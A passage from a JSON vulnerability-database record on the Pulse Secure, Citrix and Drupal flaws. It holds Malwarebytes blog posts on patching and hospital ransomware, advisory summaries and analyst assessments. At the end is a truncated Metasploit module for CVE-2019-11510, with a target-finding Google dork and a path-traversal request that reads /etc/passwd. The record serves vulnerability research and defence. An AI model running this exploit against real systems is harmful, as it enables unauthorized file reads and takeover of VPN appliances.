["CVE-2019-11510"], "modified": "2019-10-18T16:36:36", "id": "MALWAREBYTES:5B32671B820EEB03840B798BCEA9FDC8", "href": "https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-04T22:43:41", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) has issued binding directive 22-01 titled [Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities>). This directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third-parties on an agency\u2019s behalf.\n\nOne of the most welcomed of the required actions set forth in the directive is that CISA will keep a [catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) of vulnerabilities alongside timeframes in which they must be remediated. According to the plan, this catalog will list only the most important vulnerabilities that have proven to pose the biggest risks.\n\n### The scope\n\nIn the US, a binding operational directive is an instruction that federal, executive branch, departments and agencies have to follow. They also provide a strong indication of the kind of cybersecurity measures that CISA thinks are important, which other organizations may wish to follow. (It&#x27;s also easy to imagine that what&#x27;s required of federal agencies today may be required of the vast web of suppliers to federal agencies tomorrow.)\n\nTo that end, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments review and monitor its catalog. CISA has done the hard work of identifying what should be patched first, and anyone who follows its guidance is likely to find their security and resilience posture improved.\n\n### The reason\n\nIt will come as no surprise that the continued cyberattacks against US entities are the reason for this directive: &quot;The United States faces persistent and increasingly sophisticated malicious cyber campaigns that threaten the public sector, the private sector, and ultimately the American people\u2019s security and privacy.\u201d\n\nMany of the attacks against US organizations rely on vulnerabilities that could have been patched months or even years ago, but haven&#x27;t been. For example, earlier this year CISA issued a joint advisory with the FBI and NSA urging US organizations to patch [five old vulnerabilities](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities/>) from 2018 and 2019 that were regularly exploited by the Russian Foreign Intelligence Service.\n\nThe idea is that better patch management, supported by the prioritization provided by the CISA catalog, can prevent future attacks.\n\n### The rules\n\nThe required actions are pretty simple and straightforward\u2014to read at least. Execution of the rules may prove to be more difficult. The rules are:\n\n * **Plan**. Organizations have 60 days to come up with a vulnerability management plan.\n * **Execute**. CISA is giving notice that the clock is running on vulnerabilities it cares about. The affected departments and agencies have six months to fix anything with a CVE issued before 2021, and two weeks to fix everything else.\n * **Report**. Organizations have to report on the status of vulnerabilities through the Continuous Diagnostics and Mitigation (CDM) Federal Dashboard.\n\nWhile 6 months may seem a long time for the CVE\u2019s prior to 2021, that doesn\u2019t mean they are less important than this year&#x27;s vulnerabilities. The grace period may reflect the difficulty that organizations have already had in fixing older bugs, or the fact that &quot;everything prior to 2021&quot; is just a much longer period of time than the ten months of 2021. After six months is up and all those vulnerabilities are fixed, presumably everyone will be on a much shorter lease, with just two weeks to fix anything CISA deems serious enough to put on its list.\n\nIn some cases the catalog already lists a vulnerability with a due date in the past, such as [CVE-2019-11510](<https://blog.malwarebytes.com/business-2/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind/>). In August, 2019, scans performed by Bad Packets found a total of 14,528 Pulse Secure VPN endpoints vulnerable to CVE-2019-11510, four months after a patch became avaiable. Over 5,000 of those were in the US, including military, federal, state, and local government agencies\u2014and this was after advisories have been issued by the NSA and the NCSC.\n\nThe notes column for this CVE references [CISA&#x27;s ED 21-03](<https://cyber.dhs.gov/ed/21-03/>) for further guidance and requirements. In that Emergency Directive you will find the due date of April 23rd of 2021. So, it was already required to be patched for organizations that are bound to follow emergency directives.\n\n### Patch management\n\nBecause patch management has proven to be a challenge, having a catalog to fall back on when you are looking for prioritization rules can be very helpful. On the other hand, by telling organizations what needs to be done, inadvertently they may skip necessary patches, simply because they were not listed. Or worse, they were listed but the people responsible for patching didn\u2019t find them.\n\nEither way, if this is a first step in setting up a compliance program, where all the vulnerabilities that are used in the wild get patched within two weeks we will certainly welcome it. We have seen the impact of, for example, the [disclosure rules](<https://googleprojectzero.blogspot.com/2021/04/policy-and-disclosure-2021-edition.html>) set forth by Google\u2019s Project Zero on the generally accepted rules for [responsible](<https://en.wikipedia.org/wiki/Responsible_disclosure>)[ disclosure](<https://en.wikipedia.org/wiki/Responsible_disclosure>), and would love to see this directive have a similar effect on the average patching speed.\n\nStay safe, everyone!\n\nThe post [CISA sets two week window for patching serious vulnerabilities](<https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-04T21:23:02", "type": "malwarebytes", "title": "CISA sets two week window for patching serious vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-11-04T21:23:02", "id": "MALWAREBYTES:6ECB9DE9A2D8D714DB50F19BAF7BF3D4", "href": "https://blog.malwarebytes.com/reports/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-08T17:44:01", "description": "A recent ransomware attack which played a significant role in the death of a German woman has put into focus both the dangers and the importance of cybersecurity today. But it has also led some to point fingers as to who was responsible. \n\nAs usual, playing the blame game helps no one, but it does remind us of the dire need to work on healthcare security.\n\n### What happened?\n\nA few weeks ago, the university hospital Uniklinikum in the German city of D\u00fcsseldorf suffered a ransomware attack. The hospital decided not to admit new patients until it resolved the situation and restored normal operations.\n\nBecause of the admissions stop, a woman in need of immediate help had to be driven to the hospital of Wuppertal which is about 20 miles further. Unfortunately, she died upon arrival. The extra 30 minutes it took to get her to the next hospital turned out to be fatal. \n\nAs it turned out, the target of the ransomware gang was not even the hospital, but the university the hospital belongs to. When the attackers learned that the hospital had fallen victim as well, they handed over the decryption key for free. Despite that key, it took the hospital more than two weeks to reach a level of operability that allowed them to take on new patients. \n\nThis is not only tragic because the woman might have been saved if the university hospital had been operational, but also because it demonstrates once more how one of the most important parts of our infrastructure is lacking adequate defenses against prevalent threats likes ransomware.\n\n### What are the main problems facing healthcare security?\n\nIn the past we have identified several elements that make the healthcare industry, and hospitals in particular, more vulnerable to cyberthreats than many other verticals. \n\nHere are some of those problem elements:\n\n * The Internet of Things (IoT): Due to their nature and method of use, you will find a lot of IoT devices in hospitals that all run on different operating systems and require specific security settings in order to shield them from the outside world.\n * Legacy systems: Quite often, older equipment will not run properly under newer operating systems which results in several systems that are running on an outdated OS and even on software that has reached the [end-of-life point](<https://blog.malwarebytes.com/awareness/2020/03/windows-7-is-eol-what-next/>). This means that the software will no longer receive patches or updates even when there are known issues.\n * Lack of adequate backups: Even when the underlying problem has been resolved, it can take far too long for an attacked target to get back to an operational state. Institutes need to at least have a backup plan and maybe even backup equipment and servers for the most vital functions so they can keep them running when disaster strikes.\n * Extra stressors: Additional issues like COVID-19, fires, and other natural disasters can cut time and push aside the need to perform updates, make backups, or think about anything cybersecurity related. These stressors and other reasons are often referred to as &quot;we have more important things to do.&quot;\n\n### IoT security risks\n\nMany medical devices that investigate and monitor the patient are connected to the internet. We consider them to be part of the [Internet of Things (IoT)](<https://blog.malwarebytes.com/101/2017/12/internet-things-iot-security-never/>). This group of devices comes with its own set of security risks, especially when it comes to [personally ](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>)[identifiable](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>)[ information (PII)](<https://blog.malwarebytes.com/security-world/2019/04/what-is-personal-information-in-legal-terms-it-depends/>). \n\nIn every case it is advisable to investigate whether the devices\u2019 settings allow to approach it over the intranet instead of the internet. If possible, that makes it easier to shield the device from unauthorized access and keep the sensitive data inside the security perimeter.\n\n### Legacy systems\n\nMedical systems come from various suppliers and in any hospital you will find many different types. Each with their own goal, user guide, and updating regime. For many legacy systems, the acting rule of thumb will be not to tinker with it if it works. The fear of a system failure outweighs the urgency to install the latest patches. And we can relate to that state of mind except when applied to security updates on a connected system.\n\n### Disaster stress\n\nOkay, here comes our umpteenth mention of COVID-19\u2014I know, but it is a factor that we can\u2019t ignore. \n\nThe recent global pandemic contributes to the lack of time that IT staff at many healthcare organizations feel they have. The same is true for many other disasters that require emergency solutions to be set up. \n\nIn some cases, entire specialized clinics were built to deal with COVID-19 victims, and to replace lost capacity in other disasters like wildfires and earth slides.\n\n### More important matters at hand?\n\nIt&#x27;s difficult to overstate the importance of &quot;triage&quot; in the healthcare system. Healthcare professionals like nurses and doctors likely practice it every day, prioritizing the most critical patient needs on a second-by-second basis. \n\nIt should serve as no surprise that triaging has a place in IT administration, too. Healthcare facilities should determine which systems require immediate attention and which systems can wait. \n\nInterestingly, the CISO of the hospital which suffered from the ransomware attack was accused of negligence in some German media. Law enforcement in Germany is moving forward with both trying to identify the individuals behind the ransomware attack, as well as potentially charging them with negligent manslaughter because of the woman&#x27;s death. \n\nWhile we can hardly blame the CISO for the woman\u2019s death, there may come a time when inadequate security and its results may carry punishment for those responsible.\n\n### Ransomware in particular\n\nThe ransomware at play in the German case was identified as DoppelPaymer and it was determined to be planted inside the organization using the [CVE-2019-19781](<https://support.citrix.com/article/CTX267027>) vulnerability in Citrix VPNs. \n\nIn more recent news, we learned that [UHS hospitals](<https://www.bleepingcomputer.com/news/security/uhs-hospitals-hit-by-reported-country-wide-ryuk-ransomware-attack/>) in the US were hit by [Ryuk ransomware](<https://blog.malwarebytes.com/detections/ransom-ryuk/>). \n\nIt&#x27;s also important to remember that the costs of a [ransomware attack ](<https://www.malwarebytes.com/ransomware/>)are often underestimated. People tend to look only at the actual ransom amount demanded, but the additional costs are often much higher than that. \n\nIt takes many people-hours to restore all the affected systems in an organization and return to a fully operational state. The time to recover will be lower in an organization that comes prepared. Having a restoration plan and adequate backups that are easy to deploy can streamline the process of getting back in business. Another important task is to figure out how it happened and how to plug the hole, so it won\u2019t happen again. Also, a thorough investigation may be necessary to check whether the attacker did not leave any [backdoors ](<https://www.malwarebytes.com/backdoor/>)behind.\n\n### There\u2019s a problem for every solution\n\nSecurity will probably never reach a watertight quality, so besides making our infrastructure, especially the vital parts of it, as secure as possible, we also need to think ahead and make plans to deal with a breach. Whether it\u2019s a data breach or an attack that cripples important parts of our systems, we want to be prepared. Knowing what to do\u2014and in what order\u2014can save a lot of time in disaster recovery. Having the tools and backups at hand is the second step in limiting the damages and help with a speedy recovery.\n\nTo sum it up, you are going to need:\n\n * Recovery plans for different scenarios: [data breaches](<https://www.malwarebytes.com/data-breach/>), ransomware attacks, you name it\n * File backups that are recent and easy to deploy or another type of rollback method\n * Backup systems that can take over when critical systems are crippled\n * Training for those involved, or at least an opportunity to familiarize them with the steps of the recovery plans\n\nAnd last but not least, don\u2019t forget to focus on prevention. The best thing about a recovery plan is when you never need it.\n\nStay safe, everyone!\n\nThe post [Healthcare security update: death by ransomware, what&#x27;s next?](<https://blog.malwarebytes.com/business-2/2020/10/healthcare-security-death-by-ransomware/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-10-08T15:30:00", "type": "malwarebytes", "title": "Healthcare security update: death by ransomware, what\u2019s next?", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-10-08T15:30:00", "id": "MALWAREBYTES:D7EFF87E8AB1DBEC63A0DBE7F8DA90B8", "href": "https://blog.malwarebytes.com/business-2/2020/10/healthcare-security-death-by-ransomware/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:19:47", "description": "A file disclosure vulnerability exists in Pulse Connect Secure. Successful exploitation of this vulnerability would allow a remote attacker to list directories on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-09-04T00:00:00", "type": "checkpoint_advisories", "title": "Pulse Connect Secure File Disclosure (CVE-2019-11510)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-09-04T00:00:00", "id": "CPAI-2019-1097", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:17:58", "description": "A directory traversal vulnerability exists in multiple Citrix products. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-09T00:00:00", "type": "checkpoint_advisories", "title": "Citrix Multiple Products Directory Traversal (CVE-2019-19781)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-26T00:00:00", "id": "CPAI-2019-1653", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:12:02", "description": "A code execution vulnerability exists in Drupal Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2020-11-05T00:00:00", "type": "checkpoint_advisories", "title": "Drupal Core Form Rendering Remote Code Execution (CVE-2018-7600)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2020-11-05T00:00:00", "id": "CPAI-2018-1697", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-17T11:24:55", "description": "A code execution vulnerability exists in Drupal Core. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary code on the affected system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-03-29T00:00:00", "type": "checkpoint_advisories", "title": "Drupal Core Remote Code Execution (CVE-2018-7600)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-7600"], "modified": "2019-02-20T00:00:00", "id": "CPAI-2018-0192", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2022-12-10T11:13:41", "description": "In Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4, an unauthenticated remote attacker can send a specially crafted URI to perform an arbitrary file reading vulnerability .\n\n \n**Recent assessments:** \n \n**dmelcher5151** at April 15, 2020 4:11pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\n**hrbrmstr** at May 12, 2020 7:55pm UTC reported:\n\nCan download the session DB in one request and escalate to admin on the VPN concentrator. May not be configured to log unauthenticated requests. Causes massive damage. If not patched, likely wrecked.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-08T00:00:00", "type": "attackerkb", "title": "CVE-2019-11510", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2021-07-27T00:00:00", "id": "AKB:236680FB-F804-4F5D-B51D-4B50C9F69BBD", "href": "https://attackerkb.com/topics/lx3Afd7fbJ/cve-2019-11510", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-01T11:13:18", "description": "An issue was discovered in Citrix Application Delivery Controller (ADC) and Gateway 10.5, 11.1, 12.0, 12.1, and 13.0. They allow Directory Traversal.\n\n \n**Recent assessments:** \n \n**kevthehermit** at February 22, 2020 12:29am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**zeroSteiner** at January 02, 2020 3:42pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**dmelcher5151** at April 16, 2020 12:56am UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**bcook-r7** at January 11, 2020 7:23pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**hrbrmstr** at May 12, 2020 7:56pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\n**gwillcox-r7** at October 20, 2020 5:51pm UTC reported:\n\nAWS had pre built AMIs for these appliances built and supplied to the market place by Citrix.\n\nAt the time of release and for several weeks afterwards, they were still available in their default vulnerable state. Whilst AWS have removed the vulnerable images any AWS account that subscribed to a specific AMI will still have the default vulnerable version.\n\nIf you use this kind of setup it is important to remove any old AMIs and replace them, do not assume that patches will be applied to exising AMIs\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-11-05T00:00:00", "type": "attackerkb", "title": "CVE-2019-19781", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19781"], "modified": "2021-07-27T00:00:00", "id": "AKB:AFC76977-D355-470D-A7F6-FEF7A8352B65", "href": "https://attackerkb.com/topics/x22buZozYJ/cve-2019-19781", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:44", "description": "\nPulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2019-08-21T00:00:00", "type": "exploitpack", "title": "Pulse Secure 8.1R15.18.28.39.0 SSL VPN - Arbitrary File Disclosure (Metasploit)", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510"], "modified": "2019-08-21T00:00:00", "id": "EXPLOITPACK:23F64F82AC4F6039E4EBCB303C604A42", "href": "", "sourceData": "# Exploit Title: File disclosure in Pulse Secure SSL VPN (metasploit)\n# Google Dork: inurl:/dana-na/ filetype:cgi\n# Date: 8/20/2019\n# Exploit Author: 0xDezzy (Justin Wagner), Alyssa Herrera\n# Vendor Homepage: https://pulsesecure.net\n# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n# Tested on: Linux\n# CVE : CVE-2019-11510 \nrequire 'msf/core'\nclass MetasploitModule < Msf::Auxiliary\n\tinclude Msf::Exploit::Remote::HttpClient\n\tinclude Msf::Post::File\n\tdef initialize(info = {})\n\t\tsuper(update_info(info,\n\t\t\t'Name' => 'Pulse Secure - System file leak',\n\t\t\t'Description' => %q{\n\t\t\t\tPulse Secure SSL VPN file disclosure via specially crafted HTTP resource requests.\n This exploit reads /etc/passwd as a proof of concept\n This vulnerability affect ( 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4\n\t\t\t},\n\t\t\t'References' =>\n\t\t\t [\n\t\t\t [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11510' ]\n\t\t\t ],\n\t\t\t'Author' => [ '0xDezzy (Justin Wagner), Alyssa Herrera' ],\n\t\t\t'License' => MSF_LICENSE,\n\t\t\t 'DefaultOptions' =>\n\t\t {\n\t\t 'RPORT' => 443,\n\t\t 'SSL' => true\n\t\t },\n\t\t\t))\n\n\tend\n\n\n\tdef run()\n\t\tprint_good(\"Checking target...\")\n\t\tres = send_request_raw({'uri'=>'/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/'},1342)\n\n\t\tif res && res.code == 200\n\t\t\tprint_good(\"Target is Vulnerable!\")\n\t\t\tdata = res.body\n\t\t\tcurrent_host = datastore['RHOST']\n\t\t\tfilename = \"msf_sslwebsession_\"+current_host+\".bin\"\n\t\t\tFile.delete(filename) if File.exist?(filename)\n\t\t\tfile_local_write(filename, data)\n\t\t\tprint_good(\"Parsing file.......\")\n\t\t\tparse()\n\t\telse\n\t\t\tif(res && res.code == 